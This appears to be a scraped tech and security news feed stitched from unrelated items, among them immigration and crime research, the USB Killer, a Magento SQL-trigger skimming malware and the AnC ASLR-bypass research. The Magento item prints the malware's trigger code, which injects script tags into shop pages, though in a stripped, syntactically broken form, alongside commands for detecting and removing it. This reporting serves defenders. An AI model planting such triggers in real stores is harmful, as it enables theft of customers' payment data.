News & Updates

Enlarge (credit: Alex M. Hayward)

According to the White House Office of the Press Secretary, a recent Executive Order on Border Security and Immigration Enforcement was intended to address the issue of “significant increase in violent crime” due to immigration driven by “transnational criminal organizations.” These claims directly contradict the results of academic work on immigration and crime, and a recent study published in the Journal of Ethnicity in Criminal Justice reinforces that. It shows that immigration is not linked to increases in crime—in fact, this study suggests it’s linked to reductions in certain types of crimes.

This study builds on previous findings on arrests and criminal offenses. That previous data showed that foreign-born residents of the US were less likely to commit crimes than native-born Americans. The new study looked at 200 major metropolitan areas as defined by the US Census Bureau. The researchers then used Census data and FBI crime reporting data from 1970-2010 to look at trends for these regions.

The authors were interested in increases in crimes that might be attributable to an influx of immigrants who decreased economic opportunities or ended up in jobs that might otherwise have gone to local-born residents. To that end, they looked at violent crimes and property crimes, including rates of murder, non-negligent manslaughter, aggravated assault, robbery, burglary, and larceny.

Read 4 remaining paragraphs | Comments


Remember the USB Killer stick that indiscriminately and immediately fries about 95 percent of devices? Well, now the company has released a new version that is even more lethal! And you can also buy an adaptor pack, which lets you kill test devices with USB-C, Micro USB, and Lightning ports. Yay.

If you haven’t heard of the USB Killer before, it’s essentially a USB stick with a bunch of capacitors hidden within. When you plug it into a host device (a smartphone, a PC, an in-car or in-plane entertainment system), those capacitors charge up—and then a split second later, the stick dumps a huge surge of electricity into the host device, at least frying the port, but usually disabling the whole thing. For more information on its technical operation, read our original USB Killer explainer.

Read 10 remaining paragraphs | Comments



With increased competition from the likes of the (mostly) free-to-use Unity, Epic’s Unreal Engine isn’t as ubiquitous as it once was. But the particle-heavy, real-time lighting-infused version 4 has powered its fair share of games since launch in 2005, from indie darlings like Abzû through to triple-A titles like Gears of War 4.

If you’re a hardware company, getting baked-in support for your platform in Unreal’s developer tools remains important, which is why the latest UE update is good news for Nintendo. UE 4.15 includes support for the upcoming Nintendo Switch, making it it easier for developers to port games to the system. The Switch’s unloved predecessor, the Wii U, was never officially supported by UE4. While developers could create ports for Wii U without Epic’s tools, the time and investment required to do so didn’t jibe with the system’s lacklustre sales.

Support for the Switch in UE4 is currently described by Epic as “experimental,” but the company plans for it to be in a “shippable state” come the next update. Given the Switch is based on hardware from graphics card gurus Nvidia—hardware that is already supported in UE4 for devices like Nvidia’s Shield—full support is expected to arrive quickly. Indeed, one of the first UE4 games to launch on Switch will be Snake Pass, a quirky puzzle-platformer from Sumo Digital due for release in “early 2017.”

Read 7 remaining paragraphs | Comments


By Salek Ahmed

Dec 31st was the expiry date for section702 of the Foreign Intelligence Surveillance Act (FISA). Tech groups have been bandied together to remind Congress that the decision to extend the act should not be taken so lightly. And there should be an open debate rather than a rubber stamp to the provision which allows the […]

This is a post from Read the original post: To Spy or Not to Spy; Congress to Decide


Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.

Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL.

The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page.

The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape.

“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.

“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”

The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.

In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags).

echo 'SHOW TRIGGERS' | n98-magerun db:console

Once discovered the malicious trigger it is possible to delete it with a command like the following one:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

According to the expert, SQL malware attacks starts with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

Below the pattern discovered by Jeroen Boersma:

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src=""></script>%', 
		CONCAT(value, ' <script src=""></script>')
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src=""></script>%', 
		CONCAT(content, ' <script src=""></script>')

de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – SQL malware , Magento)

The post A new SQL malware Targets online shops running on Magento appeared first on Security Affairs.

Source: Security affairs

A group of security researcher has devised a new attack technique dubbed AnC attack that allows to bypass the ASLR Protection on 22 CPU architectures.

The  Address Space Layout Randomization (ASLR Protection) is a security mechanism used by operating systems to randomize the memory addresses used by key areas of processes, it makes hard for attackers to find the memory location where to inject their malicious code.

The ASLR is particularly effective against stack and heap overflows and is able to prevent arbitrary code execution triggered by any other buffer overflow vulnerability. The security measures are present in almost any modern operating system, including Windows, Linux, macOS, and Android.

The group of security researchers VUSec (Vrije University in the Netherlands) have discovered a bug in a chip that could be exploited to bypass ASLR Protection exposing millions of devices to cyber attacks, and the bad news is that the flaw cannot be fixed with a software update.

The experts of the VUSec have devised an attack technique, dubbed ASLR Cache or AnC, that can bypass ASLR protection on at least 22 processor micro-architectures from popular vendors. Chips of major vendors like Intel, AMD, ARM, Allwinner, Nvidia, and others are affected by the flaw.

VUSec has notified all the affected chip vendors and software firms, including Intel, AMD, Samsung, Nvidia, Microsoft, Apple, Google, and Mozilla, more than three months ago.

The ASLR protection bypass leverages on a simple JavaScript code that is able to determine the base addresses in memory where system and application components are executed neutralizing the Randomization process implemented by the ASLR Protection system.

A user can be hacked by simply visiting a malicious website.

ASLR Protection bypass

“The memory management unit (MMU) of modern processors uses the cache hierarchy of the processor in order to improve the performance of page table walks. This is fundamental to efficient code execution in modern processors. Unfortunately, this cache hierarchy is also shared by untrustred applications, such as JavaScript code running in the browser.” reads the description provided by the researchers. “We have built a side-channel attack, specifically an EVICT+TIME cache attack, that can detect which locations in the page table pages are accessed during a page table walk performed by the MMU.”

MMU is tasked to map the memory allocation of programs, it constantly checks the page table to keep track of the memory addresses assigned to the applications.

The page table is usually stored in the CPU’s cache to improve performance, but the directory also shares some of its cache with untrusted applications, including web browsers.

A javascript running on a malicious website can modify the content of the cache through a side channel attack, in this way an attacker can discover where software components, like libraries and RAM-mapped files, are located in the virtual memory.

Once obtained the memory addresses the attacker can map portions of the memory and launch further attacks, for example injecting malicious exploit codes, escalate access to the operating system, and take complete control of a machine.

The researchers demonstrated how to exploit the AnC JavaScript attacks via up-to-date Chrome and Firefox web browsers on 22 different CPU micro-architectures. The attack is very fast, just 90 seconds are sufficient to bypass the ASLR protection.

The VUSec research team have released two papers [1, 2] detailing the AnC attack, they also published two video PoC of the attack running in a Firefox browser on a 64-bit Linux machine.

The flaws related to the AnC attacks are tracked with the fallowing CVE identifiers:

  • CVE-2017-5925 for Intel processors
  • CVE-2017-5926 for AMD processors
  • CVE-2017-5927 for ARM processors
  • CVE-2017-5928 for a timing issue affecting multiple browsers

In order to protect our device against AnC attacks is to enable plug-ins, such as NoScript for Firefox or ScriptSafe for Chrome. In this way, untrusted JavaScript code on web pages will be blocked.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – hacking , ASLR Protection)

The post ASLR Protection could be bypassed by visiting a website. Millions of devices at risk appeared first on Security Affairs.

Source: Security affairs

Enlarge / An AR-15 lower receiver, seen here in 2014 at a store in Oceanside, California. (credit: Sandy Huffaker for The Washington Post via Getty Images)

A Sacramento, California, man was sentenced Thursday to over three years in prison for unlawful manufacture of a firearm and one count of dealing firearms.

Last year, Daniel Crowninshield pleaded guilty to those counts in exchange for federal prosecutors dropping other charges. According to investigators, Crowninshield, known online as “Dr. Death,” would sell unfinished AR-15 lower receivers, which customers would then pay for him to transform into fully machined lower receivers using a computer numerically controlled (CNC) mill. (In October 2014, Cody Wilson, of Austin, Texas, who has pioneered 3D-printed guns, began selling a CNC mill called “Ghost Gunner,” designed to work specifically on the AR-15 lower.)

“In order to create the pretext that the individual in such a scenario was building his or her own firearm, the skilled machinist would often have the individual press a button or put his or her hands on a piece of machinery so that the individual could claim that the individual, rather than the machinist, made the firearm,” the government claimed in its April 14 plea agreement.

Read 2 remaining paragraphs | Comments


Ransomware has been around for a few years, but in last two years, it has become an albatross around everyone’s neck, targeting businesses, hospitals, financial institutions and personal computers worldwide and extorting millions of dollars.

Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt


Ukraine blames Russia for a new wave of cyber attacks on its infrastructure, including the power grid and financial system.

This week Ukraine accused Russia of cyber attacks against its critical infrastructure, including power grid and financial systems. State-sponsored hackers used a new strain of malware that targets industrial processes, the malicious code looked like it was designed by the same threat actor behind the notorious BlackEnergy malware.

“Oleksandr Tkachuk, Ukraine’s security service chief of staff, said at a press conference that the attacks were orchestrated by the Russian security service with help from private software firms and criminal hackers, and looked like they were designed by the same people who created malware known as ‘BlackEnergy.’” reported the Reuters news Agency.

Tkachuk revealed that the malware used in the attacks was designed to attack specific industrial processes.

“As an example, he said that the code included modules that sought to harm equipment inside the electric grid.” reported the Reuters.

“Russian hackers and infobots become an important tool of the aggression against our country,” Tkachuk said.

The Russian Government has repeatedly denied accusations from the Ukrainian authorities that blames Moscow for cyber attacks against its infrastructure. The number of cyber attacks rapidly increased following the 2014 Crimean crisis.

According to the Ukrainian Government, Russian hackers launched 6,500 cyber attacks against its network in November and December alone. Kiev blamed Russian hackers for the power outage it has suffered in December. Hackers also targeted the defense and finance ministries and the State Treasury.

“There is a global cyber war of Russia against (the) whole world,” President Petro Poroshenko told Reuters in an interview in January at the World Economic Forum in Davos.

Tkachuk explained that the cyber attacks leverage the Telebots to infect computers that control infrastructure.

In December 2016, researchers from security firm ESET discovered that the BlackEnergy hacker group that targeted the Ukrainian grid one year ago, now identified as TeleBots, are targeting Ukrainian banks.

Ukraine TeleBots BlackEnergy

On Wednesday, cyber security experts at CyberX announced the discovery of a separate cyber espionage campaign in Ukraine that had compromised more than 60 victims, including an energy ministry, a scientific research institute and a firm that designs remote monitoring systems for oil & gas pipelines.

medianet_width=’300′; medianet_height= ‘250’; medianet_crid=’762221962′;

Pierluigi Paganini

(Security Affairs – TeleBots , Ukraine)

The post Ukraine blames Russia for new cyber attacks on its infrastructure appeared first on Security Affairs.

Source: Security affairs

Enlarge / Lee Jae-yong, vice chairman of Samsung, seen here leaving a court hearing in January 2017. (credit: Chung Sung-Jun/Getty Images)

On Friday morning local time, Lee Jae-yong, the vice chairman of Samsung, was taken into custody at the Seoul Detention Centre shortly after the Seoul Central District Court issued a warrant for his arrest on charges of bribery, perjury and embezzlement. 

According to a translation provided by the BBC, the court said in a statement: “It is acknowledged that it is necessary to arrest [Lee Jae-Yong] in light of a newly added criminal charge and new evidence.”

Lee has generally considered the de facto head of Samsung Group, since his father, still the chairman by title, was hospitalized in 2014.

Read 2 remaining paragraphs | Comments